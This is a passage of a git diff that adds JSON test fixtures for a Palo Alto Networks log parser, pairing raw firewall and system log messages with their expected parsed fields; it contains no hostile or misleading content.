null,\"SourceDeviceOSFamily\": null,\"SourceDeviceOSVersion\": null,\"SourceDeviceProfile\": null,\"SourceDeviceVendor\": null,\"SourceDynamicAddressGroup\": null,\"SourceEDL\": null,\"SourceLocation\": \"1.2.0.0-1.2.255.255\",\"SourcePort\": 59087,\"SourceUUID\": null,\"SourceUser\": null,\"Subtype\": \"end\",\"TimeGenerated\": \"2023-02-03T16:45:52.000000Z\",\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:52.582000Z\",\"TimeReceived\": \"2023-02-03T16:45:56.000000Z\",\"ToZone\": \"untrusted\",\"Tunnel\": \"N/A\",\"URLCategory\": \"any\",\"VirtualLocation\": \"vsys1\",\"VirtualSystemName\": \"\",\"X-Forwarded-ForIP\": null}"
+  },
+  "expected": {
+    "message": "{\"Action\": \"allow\",\"ActionSource\": \"from-policy\",\"Application\": \"incomplete\",\"Bytes\": 74,\"BytesReceived\": 0,\"BytesSent\": 74,\"ChunksReceived\": 0,\"ChunksSent\": 0,\"ChunksTotal\": 0,\"ConfigVersion\": \"10.1\",\"ContainerID\": null,\"ContainerName\": null,\"ContainerNameSpace\": null,\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DestinationAddress\": \"5.6.7.8\",\"DestinationDeviceCategory\": null,\"DestinationDeviceHost\": null,\"DestinationDeviceMac\": null,\"DestinationDeviceModel\": null,\"DestinationDeviceOSFamily\": null,\"DestinationDeviceOSVersion\": null,\"DestinationDeviceProfile\": null,\"DestinationDeviceVendor\": null,\"DestinationDynamicAddressGroup\": null,\"DestinationEDL\": null,\"DestinationLocation\": \"US\",\"DestinationPort\": 443,\"DestinationUUID\": null,\"DestinationUser\": null,\"DeviceName\": \"PA-VM\",\"DeviceSN\": \"007954000351998\",\"DynamicUserGroupName\": null,\"EndpointAssociationID\": 0,\"EndpointSerialNumber\": null,\"FromZone\": \"untrusted\",\"GPHostID\": null,\"HASessionOwner\": null,\"HTTP2Connection\": 0,\"IMEI\": null,\"IMSI\": 0,\"InboundInterface\": \"ethernet1/1\",\"LinkChangeCount\": 0,\"LinkSwitches\": null,\"LogSetting\": \"default\",\"LogType\": \"TRAFFIC\",\"NATDestination\": \"\",\"NATDestinationPort\": 0,\"NATSource\": \"\",\"NATSourcePort\": 0,\"NSSAINetworkSliceDifferentiator\": null,\"NSSAINetworkSliceType\": null,\"OutboundInterface\": \"ethernet1/1\",\"PacketsReceived\": 0,\"PacketsSent\": 1,\"PacketsTotal\": 1,\"ParentSessionID\": 0,\"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\",\"Protocol\": \"tcp\",\"RepeatCount\": 1,\"Rule\": \"intrazone-default\",\"RuleUUID\": \"f903db52-4b89-4610-b908-67be412704f0\",\"SDWANCluster\": null,\"SDWANClusterType\": null,\"SDWANDeviceType\": null,\"SDWANPolicyName\": null,\"SDWANSite\": null,\"SequenceNo\": 7195838274152187100,\"SessionDuration\": 0,\"SessionEndReason\": \"aged-out\",\"SessionID\": 17634,\"SessionStartTime\": \"2023-02-03T16:45:44.000000Z\",\"SourceAddress\": \"1.2.3.4\",\"SourceDeviceCategory\": null,\"SourceDeviceHost\": null,\"SourceDeviceMac\": null,\"SourceDeviceModel\": null,\"SourceDeviceOSFamily\": null,\"SourceDeviceOSVersion\": null,\"SourceDeviceProfile\": null,\"SourceDeviceVendor\": null,\"SourceDynamicAddressGroup\": null,\"SourceEDL\": null,\"SourceLocation\": \"1.2.0.0-1.2.255.255\",\"SourcePort\": 59087,\"SourceUUID\": null,\"SourceUser\": null,\"Subtype\": \"end\",\"TimeGenerated\": \"2023-02-03T16:45:52.000000Z\",\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:52.582000Z\",\"TimeReceived\": \"2023-02-03T16:45:56.000000Z\",\"ToZone\": \"untrusted\",\"Tunnel\": \"N/A\",\"URLCategory\": \"any\",\"VirtualLocation\": \"vsys1\",\"VirtualSystemName\": \"\",\"X-Forwarded-ForIP\": null}",
+    "event": {
+      "action": "allow",
+      "category": [
+        "network"
+      ],
+      "dataset": "traffic",
+      "duration": 0,
+      "outcome": "success",
+      "start": "2023-02-03T16:45:44Z",
+      "type": [
+        "end"
+      ]
+    },
+    "@timestamp": "2023-02-03T16:45:52Z",
+    "action": {
+      "name": "allow",
+      "outcome": "success",
+      "type": "end"
+    },
+    "destination": {
+      "address": "5.6.7.8",
+      "geo": {
+        "country_iso_code": "US"
+      },
+      "ip": "5.6.7.8",
+      "nat": {
+        "port": 0
+      },
+      "port": 443
+    },
+    "log": {
+      "hostname": "PA-VM",
+      "logger": "traffic"
+    },
+    "network": {
+      "application": "incomplete",
+      "bytes": 74,
+      "packets": 1
+    },
+    "observer": {
+      "egress": {
+        "interface": {
+          "alias": "untrusted"
+        }
+      },
+      "ingress": {
+        "interface": {
+          "alias": "untrusted"
+        }
+      },
+      "name": "PA-VM",
+      "product": "PAN-OS",
+      "serial_number": "007954000351998"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "end",
+      "URLCategory": "any",
+      "VirtualLocation": "vsys1"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4",
+        "5.6.7.8"
+      ]
+    },
+    "rule": {
+      "name": "intrazone-default",
+      "uuid": "f903db52-4b89-4610-b908-67be412704f0"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "bytes": 74,
+      "ip": "1.2.3.4",
+      "port": 59087
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_update_content_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_update_content_json.json
new file mode 100644
index 000000000..2f58900ab
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_update_content_json.json	
@@ -0,0 +1,47 @@
+{
+  "input": {
+    "message": "{\"LogTime\":\"2023-02-16T15:50:25.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"general\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:50:14.000000Z\",\"VirtualLocation\":\"\",\"EventName\":\"general\",\"EventComponent\":null,\"VendorSeverity\":\"Informational\",\"EventDescription\":\"Content update job succeeded  for user admin\",\"SequenceNo\":7200776623254143155,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:50:14.343000Z\"}\n"
+  },
+  "expected": {
+    "message": "{\"LogTime\":\"2023-02-16T15:50:25.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"general\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:50:14.000000Z\",\"VirtualLocation\":\"\",\"EventName\":\"general\",\"EventComponent\":null,\"VendorSeverity\":\"Informational\",\"EventDescription\":\"Content update job succeeded  for user admin\",\"SequenceNo\":7200776623254143155,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:50:14.343000Z\"}\n",
+    "event": {
+      "category": [
+        "host"
+      ],
+      "dataset": "system",
+      "reason": "Content update job succeeded  for user admin",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-16T15:50:14Z",
+    "action": {
+      "type": "general"
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Informational",
+      "logger": "system"
+    },
+    "observer": {
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "general"
+    },
+    "related": {
+      "user": [
+        "admin"
+      ]
+    },
+    "user": {
+      "name": "admin"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_upgrade_package_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_upgrade_package_json.json
new file mode 100644
index 000000000..9a1d42f34
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_upgrade_package_json.json	
@@ -0,0 +1,47 @@
+{
+  "input": {
+    "message": "{\"LogTime\":\"2023-02-16T15:49:49.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"general\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:49:34.000000Z\",\"VirtualLocation\":\"\",\"EventName\":\"general\",\"EventComponent\":null,\"VendorSeverity\":\"Informational\",\"EventDescription\":\"Content package upgraded from version 8671-7826 to 8676-7858 by admin\",\"SequenceNo\":7200776623254143153,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:49:34.604000Z\"}\n"
+  },
+  "expected": {
+    "message": "{\"LogTime\":\"2023-02-16T15:49:49.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"general\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:49:34.000000Z\",\"VirtualLocation\":\"\",\"EventName\":\"general\",\"EventComponent\":null,\"VendorSeverity\":\"Informational\",\"EventDescription\":\"Content package upgraded from version 8671-7826 to 8676-7858 by admin\",\"SequenceNo\":7200776623254143153,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:49:34.604000Z\"}\n",
+    "event": {
+      "category": [
+        "host"
+      ],
+      "dataset": "system",
+      "reason": "Content package upgraded from version 8671-7826 to 8676-7858 by admin",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-16T15:49:34Z",
+    "action": {
+      "type": "general"
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Informational",
+      "logger": "system"
+    },
+    "observer": {
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "general"
+    },
+    "related": {
+      "user": [
+        "admin"
+      ]
+    },
+    "user": {
+      "name": "admin"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_user_authentication_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_user_authentication_json.json
new file mode 100644
index 000000000..ea53d3353
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_user_authentication_json.json	
@@ -0,0 +1,54 @@
+{
+  "input": {
+    "message": "{\"LogTime\":\"2023-02-16T15:41:25.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"auth\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:41:18.000000Z\",\"VirtualLocation\":null,\"EventName\":\"auth-success\",\"EventComponent\":\"\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"authenticated for user 'admin'.   From: 1.2.3.4.\",\"SequenceNo\":7200776623254143115,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:41:18.813000Z\"}\n"
+  },
+  "expected": {
+    "message": "{\"LogTime\":\"2023-02-16T15:41:25.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"auth\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:41:18.000000Z\",\"VirtualLocation\":null,\"EventName\":\"auth-success\",\"EventComponent\":\"\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"authenticated for user 'admin'.   From: 1.2.3.4.\",\"SequenceNo\":7200776623254143115,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:41:18.813000Z\"}\n",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "dataset": "system",
+      "reason": "authenticated for user 'admin'.   From: 1.2.3.4.",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-16T15:41:18Z",
+    "action": {
+      "type": "auth"
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Informational",
+      "logger": "system"
+    },
+    "observer": {
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "auth"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "admin"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    },
+    "user": {
+      "name": "admin"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_userid.json b/Palo Alto Networks/paloalto-prima-access/tests/test_userid.json
new file mode 100644
index 000000000..dee27d0e1
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_userid.json	
@@ -0,0 +1,60 @@
+{
+  "input": {
+    "message": "1,2024/01/12 11:23:33,01545100000000,USERID,login,2222,2024/01/12 11:23:33,vsys1,1.2.3.4,test.fr\\JDOE,,0,1,10888,0,0,vpn-client,globalprotect,555555555555555555555555,0x8000000000000000,0,0,0,0,,test-01,1,,2024/01/12 11:23:33,1,0x80000000,dtest,,2024-01-12T11:23:33.907+01:00"
+  },
+  "expected": {
+    "message": "1,2024/01/12 11:23:33,01545100000000,USERID,login,2222,2024/01/12 11:23:33,vsys1,1.2.3.4,test.fr\\JDOE,,0,1,10888,0,0,vpn-client,globalprotect,555555555555555555555555,0x8000000000000000,0,0,0,0,,test-01,1,,2024/01/12 11:23:33,1,0x80000000,dtest,,2024-01-12T11:23:33.907+01:00",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "dataset": "userid",
+      "type": [
+        "start"
+      ]
+    },
+    "@timestamp": "2024-01-12T10:23:33.907000Z",
+    "action": {
+      "type": "login"
+    },
+    "destination": {
+      "port": 0
+    },
+    "log": {
+      "hostname": "test-01",
+      "logger": "userid"
+    },
+    "observer": {
+      "name": "test-01",
+      "product": "PAN-OS",
+      "serial_number": "01545100000000"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "EventID": "0",
+      "Threat_ContentType": "login",
+      "VirtualLocation": "vsys1",
+      "VirtualSystemID": "1"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "JDOE"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "port": 0
+    },
+    "user": {
+      "domain": "test.fr",
+      "name": "JDOE"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_web_authentication_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_web_authentication_json.json
new file mode 100644
index 000000000..23d0aaaf8
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_web_authentication_json.json	
@@ -0,0 +1,57 @@
+{
+  "input": {
+    "message": "{\"LogTime\":\"2023-02-16T15:41:25.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"general\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:41:18.000000Z\",\"VirtualLocation\":\"\",\"EventName\":\"general\",\"EventComponent\":null,\"VendorSeverity\":\"Informational\",\"EventDescription\":\"User admin logged in via Web from 1.2.3.4 using https\",\"SequenceNo\":7200776623254143116,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:41:18.825000Z\"}\n"
+  },
+  "expected": {
+    "message": "{\"LogTime\":\"2023-02-16T15:41:25.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"general\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:41:18.000000Z\",\"VirtualLocation\":\"\",\"EventName\":\"general\",\"EventComponent\":null,\"VendorSeverity\":\"Informational\",\"EventDescription\":\"User admin logged in via Web from 1.2.3.4 using https\",\"SequenceNo\":7200776623254143116,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:41:18.825000Z\"}\n",
+    "event": {
+      "category": [
+        "host"
+      ],
+      "dataset": "system",
+      "reason": "User admin logged in via Web from 1.2.3.4 using https",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-16T15:41:18Z",
+    "action": {
+      "type": "general"
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Informational",
+      "logger": "system"
+    },
+    "network": {
+      "protocol": "https"
+    },
+    "observer": {
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "general"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "admin"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    },
+    "user": {
+      "name": "admin"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_wildfire_failure_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_wildfire_failure_json.json
new file mode 100644
index 000000000..c3b8bcffc
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_wildfire_failure_json.json	
@@ -0,0 +1,52 @@
+{
+  "input": {
+    "message": "{\"LogTime\":\"2023-02-16T17:45:55.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"fb\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T17:45:43.000000Z\",\"VirtualLocation\":null,\"EventName\":\"wildfire-conn-failed\",\"EventComponent\":\"\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"Failed to perform task resulting in connection timeout with WildFire Cloud wildfire.paloaltonetworks.com\",\"SequenceNo\":7200776623254143341,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T17:45:43.111000Z\"}\n"
+  },
+  "expected": {
+    "message": "{\"LogTime\":\"2023-02-16T17:45:55.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"fb\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T17:45:43.000000Z\",\"VirtualLocation\":null,\"EventName\":\"wildfire-conn-failed\",\"EventComponent\":\"\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"Failed to perform task resulting in connection timeout with WildFire Cloud wildfire.paloaltonetworks.com\",\"SequenceNo\":7200776623254143341,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T17:45:43.111000Z\"}\n",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "system",
+      "module": "WildFire",
+      "reason": "Failed to perform task resulting in connection timeout with WildFire Cloud wildfire.paloaltonetworks.com",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-16T17:45:43Z",
+    "action": {
+      "type": "fb"
+    },
+    "destination": {
+      "address": "wildfire.paloaltonetworks.com",
+      "domain": "wildfire.paloaltonetworks.com",
+      "registered_domain": "paloaltonetworks.com",
+      "subdomain": "wildfire",
+      "top_level_domain": "com"
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Informational",
+      "logger": "system"
+    },
+    "observer": {
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "fb"
+    },
+    "related": {
+      "hosts": [
+        "wildfire.paloaltonetworks.com"
+      ]
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/threat-url-xff.json b/Palo Alto Networks/paloalto-prima-access/tests/threat-url-xff.json
new file mode 100644
index 000000000..b6430085e
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/threat-url-xff.json	
@@ -0,0 +1,109 @@
+{
+  "input": {
+    "message": "1,2024/03/12 15:02:32,016401004874,THREAT,url,2816,2024/03/12 15:02:32,10.0.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule-internet,x-fwd-for: 11.22.33.44,,web-browsing,vsys,env,zone2,a1.1,aec.2,default,2024/03/12 15:02:32,1384927,1,49802,80,0,0,0x8b000,tcp,alert,\"www.sekoia.io:443/catalog/integrations?query=this\",(9999),any,informational,client-to-server,7324220311048193508,0x0,10.0.0.0-10.255.255.255,192.168.0.0-192.168.255.255,,,0,,,10,Mozilla/4.0 (compatible; ms-office; MSOffice 16),,\"11.22.33.44\",,,,,0,0,0,0,0,VSYS,FW,,,,get,0,,0,,N/A,N/A,AppThreat-0-0,0x0,0,4294967295,,\"Sekoia,cybertech,low-risk\",ea3431a2-6869-4d9f-ad41-1858d80b406c,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2024-03-12T15:02:32.650+01:00,,,,internet-utility,general-internet,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,web-browsing,no,no,,,NonProxyTraffic",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Palo Alto NGFW",
+        "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
+      }
+    }
+  },
+  "expected": {
+    "message": "1,2024/03/12 15:02:32,016401004874,THREAT,url,2816,2024/03/12 15:02:32,10.0.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule-internet,x-fwd-for: 11.22.33.44,,web-browsing,vsys,env,zone2,a1.1,aec.2,default,2024/03/12 15:02:32,1384927,1,49802,80,0,0,0x8b000,tcp,alert,\"www.sekoia.io:443/catalog/integrations?query=this\",(9999),any,informational,client-to-server,7324220311048193508,0x0,10.0.0.0-10.255.255.255,192.168.0.0-192.168.255.255,,,0,,,10,Mozilla/4.0 (compatible; ms-office; MSOffice 16),,\"11.22.33.44\",,,,,0,0,0,0,0,VSYS,FW,,,,get,0,,0,,N/A,N/A,AppThreat-0-0,0x0,0,4294967295,,\"Sekoia,cybertech,low-risk\",ea3431a2-6869-4d9f-ad41-1858d80b406c,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2024-03-12T15:02:32.650+01:00,,,,internet-utility,general-internet,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,web-browsing,no,no,,,NonProxyTraffic",
+    "event": {
+      "action": "alert",
+      "category": [
+        "network"
+      ],
+      "code": "9999",
+      "dataset": "threat",
+      "outcome": "success",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-03-12T14:02:32.650000Z",
+    "action": {
+      "name": "alert",
+      "outcome": "success",
+      "type": "url"
+    },
+    "destination": {
+      "address": "192.168.0.1",
+      "domain": "www.sekoia.io",
+      "ip": "192.168.0.1",
+      "nat": {
+        "ip": "0.0.0.0",
+        "port": 0
+      },
+      "port": 80
+    },
+    "http": {
+      "request": {
+        "method": "get"
+      }
+    },
+    "log": {
+      "hostname": "FW",
+      "level": "informational",
+      "logger": "threat"
+    },
+    "network": {
+      "application": "web-browsing",
+      "forwarded_ip": "11.22.33.44",
+      "transport": "tcp"
+    },
+    "observer": {
+      "name": "FW",
+      "product": "PAN-OS",
+      "serial_number": "016401004874"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "url",
+      "VirtualLocation": "vsys",
+      "VirtualSystemName": "VSYS",
+      "threat": {
+        "id": "9999"
+      }
+    },
+    "related": {
+      "hosts": [
+        "www.sekoia.io"
+      ],
+      "ip": [
+        "0.0.0.0",
+        "10.0.0.2",
+        "192.168.0.1"
+      ]
+    },
+    "rule": {
+      "name": "rule-internet",
+      "uuid": "ea3431a2-6869-4d9f-ad41-1858d80b406c"
+    },
+    "source": {
+      "address": "10.0.0.2",
+      "ip": "10.0.0.2",
+      "nat": {
+        "ip": "0.0.0.0",
+        "port": 0
+      },
+      "port": 49802
+    },
+    "url": {
+      "domain": "www.sekoia.io",
+      "path": "catalog/integrations",
+      "port": 443,
+      "query": "query=this",
+      "registered_domain": "sekoia.io",
+      "subdomain": "www",
+      "top_level_domain": "io"
+    },
+    "user_agent": {
+      "name": "Mozilla/4.0 (compatible; ms-office; MSOffice 16)"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/threat_cef.json b/Palo Alto Networks/paloalto-prima-access/tests/threat_cef.json
new file mode 100644
index 000000000..35786b908
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/threat_cef.json	
@@ -0,0 +1,128 @@
+{
+  "input": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|THREAT|spyware|1|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 20:48:21 deviceExternalId=xxxxxxxxxxxxx start=Mar 01 2021 20:48:16 PanOSApplicationCategory=general-internet PanOSApplicationContainer=sina-weibo PanOSApplicationRisk=4 PanOSApplicationSubcategory=social-networking PanOSApplicationTechnology=browser-based PanOSCaptivePortal=false PanOSCloudHostname=xxxxx PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSDestinationDeviceClass= PanOSDestinationDeviceOS= dntdom=paloaltonetwork duser=xxxxx duid= PanOSHTTPMethod=get PanOSInboundInterfaceDetailsPort=0 PanOSInboundInterfaceDetailsSlot=0 PanOSInboundInterfaceDetailsType=unknown PanOSInboundInterfaceDetailsUnit=0 PanOSIsClienttoServer=true PanOSIsContainer=false PanOSIsDecryptMirror=false PanOSIsDecrypted=false PanOSIsDuplicateLog=false PanOSIsEncrypted=false PanOSIsIPV6=false PanOSIsMptcpOn=false PanOSIsNonStandardDestinationPort=false PanOSIsPacketCapture=false PanOSIsPhishing=false PanOSIsPrismaNetwork=false PanOSIsPrismaUsers=false PanOSIsProxy=false PanOSIsReconExcluded=false PanOSIsSaaSApplication=false PanOSIsServertoClient=false PanOSIsSourceXForwarded=true PanOSIsSystemReturn=true PanOSIsTransaction=false PanOSIsTunnelInspected=false PanOSIsURLDenied=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSNAT=false PanOSNonStandardDestinationPort=13884 PanOSOutboundInterfaceDetailsPort=0 PanOSOutboundInterfaceDetailsSlot=0 PanOSOutboundInterfaceDetailsType=unknown PanOSOutboundInterfaceDetailsUnit=0 PanOSPacket= PanOSPayloadProtocolID=-1 PanOSSanctionedStateOfApp=false PanOSSeverity=Informational PanOSSourceDeviceClass= PanOSSourceDeviceOS= sntdom=paloaltonetwork suser=xxxxx suid= cat=27379 PanOSThreatNameFirewall=27379 PanOSTunneledApplication=tunneled-app PanOSURLDomain= PanOSUsers=paloaltonetwork\\\\xxxxx PanOSVerdict= PanOSVirtualSystemID=1 c6a2=fe80:110:8897:efab:9202:b3ff:fe1e:8329 c6a2Label=Source IPv6 Address c6a3=fe80:110:8897:efab:9202:b3ff:fe1e:8329 c6a3Label=Destination IPv6 Address sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 